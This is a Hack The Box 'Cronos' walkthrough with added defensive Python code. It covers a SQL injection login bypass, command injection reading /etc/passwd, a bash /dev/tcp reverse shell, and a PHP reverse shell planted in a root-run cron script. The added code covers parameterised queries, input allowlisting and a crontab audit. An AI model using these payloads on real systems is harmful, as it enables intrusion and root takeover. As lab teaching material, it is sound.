CRONOS {HACK THE BOX} WALKTHROUGH
Hey! In this article I have written a walkthrough for completing the ‘Cronos’ machine on ‘Hack The Box’. I selected this machine mainly so that beginners can understand the basic methodology of penetration testing. Hope you’ll enjoy it.
SCANNING AND RECONNAISSANCE
TARGET -> http://10.10.10.13/
NMAP SCAN RESULTS
First, let's start with a network scan to find out what ports and services are available on this server. In the following command, ‘-sC’ runs the default scripts, ‘-A’ enables aggressive scanning and ‘-T4’ sets the timing template, i.e. the speed of the scan.
root@snowdox:/home/snowdox# nmap -sC -A -T4 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-24 21:28 EST
Nmap scan report for 10.10.10.13
Host is up (0.22s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10-4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16-4.6 (92%), Linux 3.2-4.9 (92%), Linux 3.8-3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 197.23 ms 10.10.14.1
2 198.61 ms 10.10.10.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.40 seconds
Here you can see that ports 53 and 80 are open :) two perfect ports to start enumerating those services.
EDITED THE HOST FILE
In this step I’ll be adding the domain ‘cronos.htb’ to the /etc/hosts file so that it resolves to the target IP and we get to the proper web page.
Eg-: nano /etc/hosts, then insert the IP and domain as shown below and press CTRL+O to save the file
{CHECK THE WEBSITE ENUMERATION SECTION FOR THE RESULTS}
NIKTO SCAN RESULTS
Just because I was curious, I thought of running nikto too, in case it would find a potential vulnerability in the system or any other interesting directories.
Eg-: nikto -h {ip address}
As you can see, after running the scan we can confirm that the web server is indeed ‘Apache/2.4.18’, as we saw in the nmap scan. Now let's move on to enumerating the web server on port 80.
WEBSITE ENUMERATION
FRONT PAGE
The front end of the website is the default Apache page. As a good habit, it's better to check the source code of every website you visit, in case there are hard-coded credentials or directories in it.
ENUMERATING DIRECTORIES
I TRIED ENUMERATING USING GOBUSTER AND DIRSEARCH BUT NO LUCK
Eg-: gobuster dir -u http://{ip} -w {wordlist path}
NEW PAGE AFTER EDITING THE HOSTS FILE {check the Scanning and Reconnaissance section for the DNS enumeration}
This is after entering the domain ‘cronos.htb’ in the /etc/hosts file. Now we have a new website, but I still couldn't brute-force the directories because something was blocking me. So I decided to try a DNS zone transfer using the tool ‘dig’.
GOT SOME DOMAINS AFTER DOING SOME DNS ENUMERATION (ZONE TRANSFER)
Eg-: dig axfr @{ip} cronos.htb (axfr -> performs a zone transfer)
AFTER THAT I UPDATED MY /etc/hosts FILE BY ADDING THE GATHERED DOMAIN NAMES
AFTER CLICKING ALL THE LINKS IN THE WEBSITE I FOUND OUT THAT ITS CMS IS LARAVEL :) ESPECIALLY BY VISITING THE GITHUB PAGE.
TRIED TO GET AN EXPLOIT USING SEARCHSPLOIT
But it wasn't necessary, since we had command injection and SQL injection vulnerabilities. I think we could do it using the Metasploit Framework's (Ruby script) remote code execution exploit too.
SQL INJECTION
After getting access to the ‘admin.cronos.htb’ domain I came across a login page. I thought I had to do some brute-forcing, but I didn't have any hints, so I changed the plan: I intercepted the login request using Burp Suite, sent the request to the Intruder tab and marked the username and password as my payload positions. I wanted to check whether there was any SQL injection vulnerability, so I got a list of SQL injection payloads and started the attack.
TRYING TO INJECT THE LOGIN FORM WITH SQL INJECTION USING BURP SUITE. WE CAN GET THE SQL INJECTION AUTHENTICATION BYPASS CHEAT SHEET FROM:
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
RESULTS OF THE SCAN
{WE FOUND A 302 RESPONSE, WHICH STANDS OUT AMONG ALL THE 200 RESPONSES. LET'S CHECK THAT QUERY IN THE LOGIN PAGE}
SQL INJECTION PAYLOAD -> (admin' or '1'='1)
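Why that payload logs us in, and what stops it, shown with an added Python example (my code, not the page's or the Cronos application's): an in-memory SQLite table stands in for the admin login's user table, a string-concatenated query is compared with a parameterised one, and a small regex flags tautology payloads so a defender can log or block them. The table layout and the stored password are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the admin login's user table (assumption: the real
# app is PHP/Laravel; this in-memory SQLite table only mirrors the shape).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return db

def login_vulnerable(db, username, password):
    """String-concatenated query: the payload becomes part of the SQL syntax."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    # With username = admin' or '1'='1 the WHERE clause reads
    #   username = 'admin' or '1'='1' AND password = '...'
    # and AND binds tighter than OR, so username = 'admin' alone satisfies it.
    return db.execute(query).fetchone() is not None

def login_fixed(db, username, password):
    """Parameterised query: the driver binds the values, quotes stay literal."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

# Cheap detection hook for login logs or a WAF rule: a quote followed by OR/AND
# is the shape of every tautology payload on the cheat sheet linked above.
_TAUTOLOGY = re.compile(r"""['"]\s*(or|and)\b""", re.IGNORECASE)

def looks_like_sqli(value):
    return _TAUTOLOGY.search(value) is not None

if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))  # True: bypassed
    print("fixed:     ", login_fixed(db, payload, "wrong"))       # False: rejected
    print("flagged:   ", looks_like_sqli(payload))               # True
```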
AFTER LOGGING IN WE GET TO SOME SORT OF NETWORK TESTING INPUT FIELD, FROM WHICH WE CAN PING AND TRACEROUTE AN IP ADDRESS
THIS IS HOW IT LOOKS AFTER INTERCEPTING THE PING COMMAND VIA BURP SUITE
IF WE EDIT THE COMMAND AND SEND THIS ->
command=cat&host=/etc/passwd
SURPRISE, YOU CAN READ THE PASSWORD FILE. COMMAND INJECTION ACTIVATED :)
NOW WE HAVE TO GET A REVERSE SHELL BY ABUSING THE COMMAND INJECTION VULNERABILITY. YOU CAN FIND A LIST OF REVERSE SHELLS HERE ->
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
After using this bash one-liner, bash -i >& /dev/tcp/10.0.0.1/4242 0>&1, the full command is bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1' (change the IP and port to your own). It's better to URL-encode it in case it doesn't get past the web filters. To do that, highlight the command in Burp Suite and press ‘CTRL+U’.
SINCE WE HAVE A REVERSE SHELL NOW, LET'S MOVE ON TO PRIVILEGE ESCALATION
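How the ping/traceroute field should have been written, as an added Python example (mine, not the Cronos application's code): the command is looked up in an allowlist, the host must parse as an IP address or a plain hostname, and the tool runs without a shell, so a request like command=cat&host=/etc/passwd is rejected before anything executes. The allowed commands and their fixed flags are assumptions.

```python
import ipaddress
import re
import subprocess

# Allowlist: the only two actions the network-testing form is meant to expose,
# each with a fixed argv prefix (assumption: the real app's options are unknown).
ALLOWED_COMMANDS = {
    "ping": ["ping", "-c", "4"],
    "traceroute": ["traceroute"],
}
# One DNS label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
# Rejecting a leading hyphen also stops the host being parsed as a tool option.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")

def is_valid_host(host):
    """Accept a literal IPv4/IPv6 address or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL.match(label) for label in host.split("."))

def build_argv(command, host):
    """Return the argv list to run, or raise ValueError for anything off the allowlist."""
    if command not in ALLOWED_COMMANDS:
        raise ValueError("command not allowed: %r" % command)
    if not is_valid_host(host):
        raise ValueError("host failed validation: %r" % host)
    return ALLOWED_COMMANDS[command] + [host]

def is_safe_request(command, host):
    """Boolean form of build_argv, handy for logging rejected requests."""
    try:
        build_argv(command, host)
        return True
    except ValueError:
        return False

def run_network_test(command, host):
    """Run the tool with shell=False: the host is one argv entry, never shell text."""
    return subprocess.run(build_argv(command, host), capture_output=True,
                          text=True, timeout=30, check=False)

if __name__ == "__main__":
    # The injection from the page (command=cat&host=/etc/passwd) is refused before any exec.
    print(is_safe_request("cat", "/etc/passwd"))      # False
    print(is_safe_request("ping", "10.10.10.13"))     # True
    print(build_argv("traceroute", "cronos.htb"))     # ['traceroute', 'cronos.htb']
```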
PRIVILEGE ESCALATION
BASIC ENUMERATION ON A LINUX MACHINE
1) www-data@cronos:/home$ export TERM=xterm
2) www-data@cronos:/home$ whoami (shows the current user's name)
3) www-data@cronos:/home$ id (shows your user and group identification numbers)
4) www-data@cronos:/home$ find / -perm -u=s -type f 2>/dev/null (you can use it to find SUID-enabled files on the system)
IF YOU CHANGE YOUR DIRECTORY TO /home/{user}/ YOU CAN FIND user.txt (THE FLAG)
AUTOMATED PRIVILEGE ESCALATION ENUMERATION USING THE ‘LinEnum.sh’ SCRIPT. DOWNLOAD IT FROM HERE:
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Change your directory to ‘/dev/shm’ (a writable location on the target). Then, on your own machine, go to the directory where your linenum.sh file is located and start a Python web server with ‘python3 -m http.server’. In the reverse shell, type ‘wget http://{user ip}:8000/linenum.sh’ in the terminal.
The picture above is the reverse shell :’)
Make the script executable by typing ‘chmod +x linenum.sh’ and start it by typing ‘./linenum.sh’
CRONJOB
It’s better if you scroll up and down to look for any suspicious activity on the system.
From the picture above we can see that there is an odd service running as a ‘cronjob’, called artisan, which runs every minute. Let's try to exploit it to gain root access.
Change your directory to where the file is located and type ‘ls -al’ to see more details about the file permissions.
As we can see, it allows us to read and write the file :)
To exploit it we have to edit the script so that it gives us a root shell, for example by embedding a reverse shell to another port on our machine.
So I removed the original artisan file and created a new artisan file containing a PHP reverse shell →
<?php
// Connect back to the listener; change the IP to your tun0 (VPN) IP and the port to the one you listen on.
$sock=fsockopen("10.0.0.1",4242);
// Attach an interactive shell to the socket (file descriptor 3) for stdin, stdout and stderr.
exec("/bin/sh -i <&3 >&3 2>&3");
?>
After that I started a Python web server and transferred the artisan file to the target through the reverse shell. I waited for 1 minute while listening on the chosen port (any port number), and soon after the execution we got a root shell :)
So I hope you at least got the methodology for testing a system for potential vulnerabilities. Remember!! this is just a basic walkthrough :) and you'll face more challenging and more time-consuming machines. Enumeration is the key.
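The cron weakness from the defender's side, as an added Python example that is not part of the walkthrough: it parses a system crontab, picks out the files each root job executes and reports any regular file that group or world can write, which is the condition LinEnum flagged on this machine. The crontab text is constructed, and the artisan path in it is a placeholder because the page does not give the real one.

```python
import os
import stat

# Constructed /etc/crontab excerpt modelled on the finding above: a root job that
# runs a Laravel artisan script every minute (assumption: the path is a placeholder).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root /usr/bin/php /var/www/app/artisan schedule:run >> /dev/null 2>&1
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

def parse_system_crontab(text):
    """Yield (user, command) for each job line of a system crontab (5 time fields + user)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0] or len(fields) < 7:   # VAR=value lines, @reboot-style lines
            continue
        yield fields[5], fields[6]

def command_paths(command):
    """Absolute paths in a command string: the interpreter and the script it runs."""
    return [tok for tok in command.split() if tok.startswith("/")]

def writable_by_others(path):
    """True for a regular file that group or world can write (the weakness abused above)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return stat.S_ISREG(mode) and bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text, is_writable=writable_by_others):
    """Return (user, path) pairs where a root job executes a file others can modify."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in command_paths(command):
            if is_writable(path):
                findings.append((user, path))
    return findings

if __name__ == "__main__":
    # On a live box pass open("/etc/crontab").read(); here a fake permission check
    # marks the artisan script writable to show what a finding looks like.
    fake = lambda p: p == "/var/www/app/artisan"
    print(audit_crontab(SAMPLE_CRONTAB, is_writable=fake))  # [('root', '/var/www/app/artisan')]
```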
“ALWAYS TRY HARDER”
THANK YOU FOR READING
AUTHOR: NATHANEAL (AKA SNOWDOX)